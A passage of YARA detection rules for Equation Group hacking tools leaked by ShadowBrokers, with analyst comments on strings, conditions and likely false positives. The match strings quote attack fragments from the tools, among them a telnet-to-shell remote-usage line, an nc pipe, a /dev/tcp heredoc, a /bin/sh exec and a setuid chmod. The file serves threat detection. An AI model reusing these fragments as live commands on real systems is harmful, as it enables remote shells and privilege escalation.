// indicates that exploit (widely available) rather than anything unique to the
// leaked copy; attribute only after matching hash1. The hard-coded 45295 in $s4
// is the exploit's connect-back port and is worth a network-log search on hosts
// where the binary is found.
rule EquationGroup_sambal {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file sambal"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec"
id = "b02b442c-3e24-55f8-aa5c-926c3a3a75b4"
strings:
$s1 = "+ Bruteforce mode." fullword ascii
$s3 = "+ Host is not running samba!" fullword ascii
$s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii
$s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii
$s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii
condition:
// Small ELF with one string, or any file type with two.
( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them )
}
// pclean: ELF process/log cleaner. Note the rule name says v2_1_1_2 while the
// description names pclean.v2.1.1.0-linux-i386; cosmetic, but keep in mind when
// correlating hits with the leaked file list.
rule EquationGroup_pclean_v2_1_1_2 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97"
id = "1b31af01-8c30-513a-a615-82dcb940e06d"
strings:
$s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii
// Trailing space is part of the literal.
$s6 = "-c cmd_name: strncmp() search for 1st %d chars of commands that " fullword ascii
condition:
// Both strings required in a small ELF.
( uint16(0) == 0x457f and filesize < 40KB and all of them )
}
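// envisioncollision: Perl exploit against an IP.Board ("ipboard") admin panel
// that installs a hook via the admin URL in $s4 and reads the database via $x1.
// Shebang required (0x2123 == "#!") for the single-string branch; the
// 'all file types, 2 of them' branch also covers copies without a shebang.
// FIX: $s4 on the published page read "...applications§ion=hooks..." — the
// "&sect" of "&section" had been decoded as the HTML entity for '§' when the rule
// was rendered. The IP.Board query string is "&section=hooks"; restored here so
// the string can actually match the script.
rule EquationGroup_envisioncollision {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1"
id = "8d512d9a-45a5-514a-bee1-a364beeaf560"
strings:
// YARA-escaped Perl source: \\$ is a literal backslash-dollar, \\\" a literal backslash-quote.
$x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii
$x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii
// Generic MSIE 6.0 user-agent; only counts towards the '2 of them' branch.
$s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii
// Admin hook-install URL; "&section=hooks" restored (see header comment).
$s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";" fullword ascii
condition:
( uint16(0) == 0x2123 and filesize < 20KB and 1 of ($x*) ) or ( 2 of them )
}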
// cmsex: ELF "Solaris rpc.cmsd remote root exploit" (self-described in $x4).
// $x3/$x5 are generic advice lines; the second branch ('2 of them', any file
// type) can pair them, so text that quotes both will match.
rule EquationGroup_cmsex {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810"
id = "9a1051a5-3f31-5fc2-85a0-beb2dea962d6"
strings:
// Trailing spaces in $x1/$x2 are part of the literals.
$x1 = "Usage: %s -i <ip_addr/hostname> -c <command> -T <target_type> (-u <port> | -t <port>) " fullword ascii
$x2 = "-i target ip address / hostname " fullword ascii
$x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii
$x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii
$x5 = "If one choice fails, you may want to try another." fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 50KB and 1 of ($x*) ) or ( 2 of them )
}
// exze: small ELF. $s2 "completed.1" appears to be a compiler/crt artifact
// (a static variable emitted by GCC start-up code) present in most GCC-linked
// ELF files, so it adds no specificity; 'all of them' means $s1 + $s3
// ("shellFile", "zeke_remove") carry the match.
rule EquationGroup_exze {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file exze"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876"
id = "d452b952-0c4a-501b-93f5-064d13f2c08e"
strings:
$s1 = "shellFile" fullword ascii
$s2 = "completed.1" fullword ascii
$s3 = "zeke_remove" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 80KB and all of them )
}
// DUL: shellcode encoder ("decoder+(encoded-decoder)+payload", $x2). The
// leading '?' in $x1 presumably reproduces a byte preceding "Usage" in the
// binary; leave it as-is and verify against hash1 rather than "cleaning" it.
// Second branch ('all of them') has no type gate.
rule EquationGroup_DUL {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file DUL"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e"
id = "6dd90b30-30cb-531c-b8e2-fc208b21e8e6"
strings:
$x1 = "?Usage: %s <shellcode> <output_file>" fullword ascii
$x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them )
}
// slugger2: ELF remote exploit targeting a print service (usage takes a
// printer_name). $s1-$s4 look like threading-library / crt internal symbol names
// rather than tool text; they only establish "a statically linked ELF of this
// toolchain" and are required alongside an $x string in the first branch.
rule EquationGroup_slugger2 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf"
id = "3787a39e-0123-5b46-90c9-6b772b1fd96c"
strings:
// Tool-specific usage/limit messages.
$x1 = "usage: %s hostip port cmd [printer_name]" fullword ascii
$x2 = "command must be less than 61 chars" fullword ascii
// Library/toolchain symbols; low specificity on their own.
$s1 = "__rw_read_waiting" ascii
$s2 = "completed.1" fullword ascii
$s3 = "__mutexkind" ascii
$s4 = "__rw_pshared" ascii
condition:
// Small ELF: at least four strings including one $x; otherwise all six anywhere.
( uint16(0) == 0x457f and filesize < 50KB and ( 4 of them and 1 of ($x*) ) ) or ( all of them )
}
// ebbisland: remote exploit with a "core wipe" option ($x3/$x4) intended to
// remove the core file a failed attempt leaves on the target. Forensic note: a
// core dump of the targeted daemon on a suspected victim is evidence of an
// attempt — preserve it before any cleanup. No type gate; '1 of them' < 250KB.
rule EquationGroup_ebbisland {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977"
id = "d30b9f26-c2c5-5ecb-9f63-e96017788e40"
strings:
$x1 = "Usage: %s [-V] -t <target_ip> -p port" fullword ascii
$x2 = "error - shellcode not as expected - unable to fix up" fullword ascii
$x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii
$x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii
$x5 = "-A <jumpAddr> (shellcode address)" fullword ascii
$x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii
condition:
filesize < 250KB and 1 of them
}
// jackpop: small ELF raw-socket tool ($s1 "are you root?", $s4 "raw troubles").
// $s2-$s4 are short and generic; the first branch therefore requires three
// strings in a small ELF, the second all five anywhere.
rule EquationGroup_jackpop {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519"
id = "7c650752-200b-51e7-95c2-4d385bfd5844"
strings:
$x1 = "%x:%d --> %x:%d %d bytes" fullword ascii
$s1 = "client: can't bind to local address, are you root?" fullword ascii
$s2 = "Unable to register port" fullword ascii
$s3 = "Could not resolve destination" fullword ascii
$s4 = "raw troubles" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them )
}
// parsescan: Perl scan-output parser (companion to jparsescan; see the
// "-f file" vs "-f directory" difference in the usage line). No type gate.
rule EquationGroup_parsescan {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef"
id = "bbe8b518-2bf0-5de4-8fb8-9b8609d393dc"
strings:
// Perl regex source; \\s is a literal backslash-s in the file.
$s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii
$s2 = "Usage: $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii
condition:
filesize < 250KB and 1 of them
}
// jscan: Perl front-end that launches "java -jar jscanner.jar" ($s2). On a hit,
// look for jscanner.jar alongside the script; it is the actual scanner and is
// not covered by this rule.
rule EquationGroup_jscan {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file jscan"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe"
id = "c4cebc69-8ec8-5ad7-bd93-55565b3eb92b"
strings:
$s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii
$s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii
condition:
filesize < 250KB and 1 of them
}
// promptkill: Perl helper that pops an xterm asking whether to kill a process.
// The /current/tmp/promptkill.kid.$tag path in $x1 is the distinctive operator
// working-directory layout; the xterm options in $x2 are otherwise unremarkable.
rule EquationGroup_promptkill {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d"
id = "e0749b10-fa5a-5d73-86e1-e2008e121674"
strings:
$x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii
$x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii
condition:
filesize < 250KB and 1 of them
}
// epoxyresin.v1.0.0.1: Linux kernel privilege-escalation tool that reads
// /boot/System.map-<version> ($s3), i.e. resolves kernel symbols at runtime.
// NOTE(review): the first branch accepts $x1 alone in any ELF under 30KB, and
// "[-] kernel not vulnerable" is shared by many public Linux LPE proof-of-concepts
// (and by elgingamble/envoytomato in this set), so expect co-firing and
// non-actor hits; the $s strings are what tie a hit to this sample.
rule EquationGroup_epoxyresin_v1_0_0 {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73"
id = "390a13b0-3246-5bf7-8841-775a43045172"
strings:
$x1 = "[-] kernel not vulnerable" fullword ascii
// mkstemp-style template for the temp file referenced in $s2.
$s1 = ".tmp.%d.XXXXXX" fullword ascii
$s2 = "[-] couldn't create temp file" fullword ascii
$s3 = "/boot/System.map-%s" fullword ascii
condition:
( uint16(0) == 0x457f and filesize < 30KB and $x1 ) or ( all of them )
}
// estopmoonlit: Linux kernel privilege-escalation tool. $x1 and $x3 are generic
// exploit chatter; $x2 (the prctl-specific "not vulnerable" message) and $x4
// (the SELinux enforcing prompt) are the distinctive lines. No type gate, so
// write-ups quoting any one line also match.
rule EquationGroup_estopmoonlit {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220"
id = "7ae7a8b7-5e27-5604-8c57-6d60ffa0fb72"
strings:
$x1 = "[+] shellcode prepared, re-executing" fullword ascii
$x2 = "[-] kernel not vulnerable: prctl" fullword ascii
$x3 = "[-] shell failed" fullword ascii
// Trailing space is part of the literal (prompt text).
$x4 = "[!] selinux apparently enforcing. Continue [y|n]? " fullword ascii
condition:
filesize < 250KB and 1 of them
}
rule EquationGroup_envoytomato {
// Hunts for the leaked "envoytomato" tool by two of its error-output lines.
// hash1 is the single sample the rule was written against.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5"
id = "d1a43c98-9448-5a03-824d-5cd8e959fbf5"
strings:
// $s1 is identical to $x1 of EquationGroup_epoxyresin_v1_0_0 and is a prefix of $x2 of
// EquationGroup_estopmoonlit, so this rule is expected to fire on those samples as well;
// treat a hit as "one of the leaked Linux privilege-escalation tools", not as this file
// specifically, unless $s2 also matched.
$s1 = "[-] kernel not vulnerable" fullword ascii
$s2 = "[-] failed to spawn shell" fullword ascii
condition:
// Any one string in any file under 250KB; there is no ELF/header guard.
filesize < 250KB and 1 of them
}
rule EquationGroup_smash {
// Hunts for the leaked "smash" tool by its usage banner and argument-parsing messages.
// hash1 is the single sample the rule was written against.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file smash"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6"
id = "9a8cb090-4f47-5674-accb-f233dbb19b71"
strings:
// $x1: the tool's own usage line (target, optional port, target type).
$x1 = "T=<target IP> [O=<port>] Y=<target type>" fullword ascii
// $x2/$x3: argument-validation messages; the "assuming 22" default is presumably the
// conventional SSH port, but nothing else on the page confirms the protocol.
$x2 = "no command given!! bailing..." fullword ascii
$x3 = "no port. assuming 22..." fullword ascii
condition:
// Any one string in any file under 250KB (YARA KB = 1024); no file-type guard.
filesize < 250KB and 1 of them
}
rule EquationGroup_ratload {
// Hunts for the leaked "ratload" loader script by its temp path, usage text and the
// shell one-liner it emits. hash1 is the single sample the rule was written against.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
id = "81590569-e81b-5d97-8295-cc6f018fab98"
strings:
// $x1: hard-coded scratch path; also a useful filesystem artefact to look for on hosts.
$x1 = "/tmp/ratload.tmp.sh" fullword ascii
// $x2: the tool's remote-usage hint (a telnet-to-shell redirection). The trailing
// escaped quote is part of the original text.
$x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
// $s6: the decompress-run-delete one-liner. The identifier gap ($s1-$s5 absent) suggests
// the weaker strings of a generated set were pruned; harmless because the condition uses
// "them" rather than named strings.
$s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
condition:
// Any one string in any file under 250KB; no file-type guard.
filesize < 250KB and 1 of them
}
rule EquationGroup_ys {
// Hunts for the leaked "ys.auto" shell script by variable assignments and an error
// message found in it. hash1 is the single sample the rule was written against.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15"
id = "abd120e7-23f8-530e-b21e-c50a2b571332"
strings:
// $x1: a shell variable re-export line, quoted exactly as it appears in the script.
$x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii
// $x3: default-target derivation from /current/etc/opscript.txt; "/current" is the same
// operator working directory seen in other rules of this set (e.g. the ftshell rule).
// $x2 is absent -- presumably pruned; the condition uses "them", so nothing breaks.
$x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii
// $x4: argument-validation error text.
$x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii
condition:
// Any one string in any file under 250KB; no file-type guard.
filesize < 250KB and 1 of them
}
rule EquationGroup_ewok {
// Hunts for the leaked "ewok" ELF binary by its help/usage and version-banner strings.
// hash1 is the single sample the rule was written against.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ewok"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72"
id = "379c233f-86f8-5116-a15c-8a80b27daea6"
strings:
// All four strings are lines of the tool's own usage/help output; $x2 refers to a
// second program name ("cleaner"), so the binary appears to bundle more than one
// utility -- not verifiable from this page.
$x1 = "Example: ewok -t target public" fullword ascii
$x2 = "Usage: cleaner host community fake_prog" fullword ascii
// Trailing space is part of the original help text and is required by "fullword".
$x3 = "-g - Subset of -m that Green Spirit hits " fullword ascii
$x4 = "--- ewok version" fullword ascii
condition:
// uint16(0) == 0x457f is the little-endian read of "\x7fE", the start of the ELF magic;
// the rule therefore only fires on small ELF files, not on scripts or text copies.
( uint16(0) == 0x457f and filesize < 80KB and 1 of them )
}
rule EquationGroup_xspy {
// Hunts for the leaked "xspy" ELF binary by its single usage line.
// hash1 is the single sample the rule was written against.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file xspy"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf"
id = "fcb7246a-d613-51d7-a4f7-f767fa5f79e1"
strings:
// The tool's usage banner (X display, polling delay in microseconds, "-up" flag).
$s1 = "USAGE: xspy -display <display> -delay <usecs> -up" fullword ascii
condition:
// With a single string, "all of them" is equivalent to "$s1". uint16(0) == 0x457f is the
// little-endian read of "\x7fE" (ELF magic), so only small ELF files are considered.
( uint16(0) == 0x457f and filesize < 60KB and all of them )
}
rule EquationGroup_estesfox {
// Hunts for the leaked "estesfox" tool by one shell fragment embedded in it.
// hash1 is the single sample the rule was written against.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a"
id = "f2e8b8ba-af09-5e7c-a99c-4f620a0917c9"
strings:
// A shell fragment that makes a file root-owned and setuid (chmod 4777) under a
// /tmp/logwatch.* cron path; the setuid-in-/tmp pattern is itself a useful host-audit
// indicator beyond this rule.
$x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii
condition:
// Unlike its siblings this rule has no filesize or header guard, so every scanned file,
// regardless of size or type, is searched for $x1. The string is specific enough that
// false positives are unlikely, but consider a filesize cap if scan time matters.
all of them
}
rule EquationGroup_elatedmonkey_1_0_1_1 {
// Hunts for the leaked "elatedmonkey.1.0.1.1.sh" shell script by its usage line and
// embedded Python/PHP/bash fragments. hash1 is the single sample the rule was written
// against. Note: this rule carries a "modified" date and, unlike the neighbouring rules,
// no "license" meta entry.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
modified = "2022-08-18"
hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090"
id = "d8915305-2ed7-50b7-84d0-b139a6d3481a"
strings:
// $s1: the script's own usage line (a listener mode or a direct command).
$s1 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii
// $s2: a Python exec of /bin/sh with the script's $CMD variable interpolated.
$s2 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii
// $s3: the PHP file the script writes under the user's public_html directory.
$s3 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii
// $s4: a bash /dev/tcp heredoc to the local web port. Deliberately not "fullword",
// presumably so the heredoc delimiter that follows "<<" cannot break the match.
$s4 = "cat > /dev/tcp/127.0.0.1/80 <<" ascii
condition:
// Two of the four strings in a file under 15KB; the low cap reflects a small script.
filesize < 15KB and 2 of them
}
rule EquationGroup_scanner {
// Hunts for the leaked "scanner" tool by its output-formatting and scan-mode strings.
// hash1 is the single sample the rule was written against.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file scanner"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "dcbcd8a98ec93a4e877507058aa26f0c865b35b46b8e6de809ed2c4b3db7e222"
id = "b2f9c534-0ca7-5223-b85e-8e74c3cfa6ff"
strings:
// $x1 resembles the column header of an RPC service listing (rpcinfo-style output);
// because it is generic table text it is the string most likely to hit benign files.
$x1 = "program version netid address service owner" fullword ascii
// $x4/$x5: developer comment text and a scan-mode format string. $x2/$x3 are absent,
// presumably pruned; the condition uses "them", so nothing references them.
$x4 = "*** Sorry about the raw output, I'll leave it for now" fullword ascii
$x5 = "-scan winn %s one" fullword ascii
condition:
// Any one string in any file under 250KB; no file-type guard, so $x1 alone can match
// captured tool output or documentation as well as the binary.
filesize < 250KB and 1 of them
}
rule EquationGroup__ftshell_ftshell_v3_10_3_0 {
// Hunts for the leaked "ftshell" file-transfer shell (two samples: hash1 and hash2) by
// strings common to both. The rule name ends in v3_10_3_0 while the description names
// ftshell.v3.10.3.7 -- one of the two appears to be a typo; the page does not say which.
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- from files ftshell, ftshell.v3.10.3.7"
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
author = "Florian Roth (Nextron Systems)"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
// super_rule marks a rule built from strings shared by several samples (hence two hashes).
super_rule = 1
hash1 = "9bebeb57f1c9254cb49976cc194da4be85da4eb94475cb8d813821fb0b24f893"
hash2 = "0be739024b41144c3b63e40e46bab22ac098ccab44ab2e268efc3b63aea02951"
id = "6a2db0a0-386f-5ea6-b0bc-e28ed2fd53d5"
strings:
// $s1-$s3 look like Tcl/expect commands (set/exec/send) and reference the same "/current"
// operator working directory seen in the ys rule; $s4 is the script's header comment.
$s1 = "set uRemoteUploadCommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"" fullword ascii
// $s2 is heavily escaped expect syntax probing for bash; it is not "fullword" because
// the original line continues after "&&".
$s2 = "send \"\\[ \\\"\\$BASH\\\" = \\\"/bin/bash\\\" -o \\\"\\$SHELL\\\" = \\\"/bin/bash\\\" \\] &&" ascii
$s3 = "system rm -f /current/tmp/ftshell.latest" fullword ascii
$s4 = "# ftshell -- File Transfer Shell" fullword ascii
condition:
// uint16(0) == 0x2123 is the little-endian read of "#!", i.e. a shebang -- the script form
// of the tool. A small shebang file needs only one string; any other file needs two.
( uint16(0) == 0x2123 and filesize < 100KB and 1 of them ) or ( 2 of them )
}